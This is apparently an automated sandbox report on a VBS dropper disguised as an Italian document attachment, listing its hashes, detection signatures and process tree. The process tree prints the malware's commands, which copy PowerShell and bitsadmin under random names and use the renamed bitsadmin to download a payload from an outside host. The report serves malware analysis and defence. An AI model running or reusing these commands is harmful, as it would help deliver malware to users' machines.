Analysis

  • max time kernel
    29s
  • max time network
    28s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    14-09-2020 12:13

General

  • Target

    Allegato_doc_BRNLSN65H44H501N.vbs

  • Size

    3KB

  • MD5

    399426adfd02de2e27ebca41608be96e

  • SHA1

    7b7629618e0cf7d4826b6c8c6dceea344233df3b

  • SHA256

    a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056

  • SHA512

    68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe
      2⤵
        PID:792
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe
        2⤵
          PID:1048
        • C:\Users\Admin\AppData\Roaming\nUpPg.exe
          "C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif
          2⤵
          • Executes dropped EXE
          PID:1524

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\nUpPg.exe

      • C:\Users\Admin\AppData\Roaming\nUpPg.exe

      • memory/792-0-0x0000000000000000-mapping.dmp

      • memory/1048-1-0x0000000000000000-mapping.dmp

      • memory/1524-3-0x0000000000000000-mapping.dmp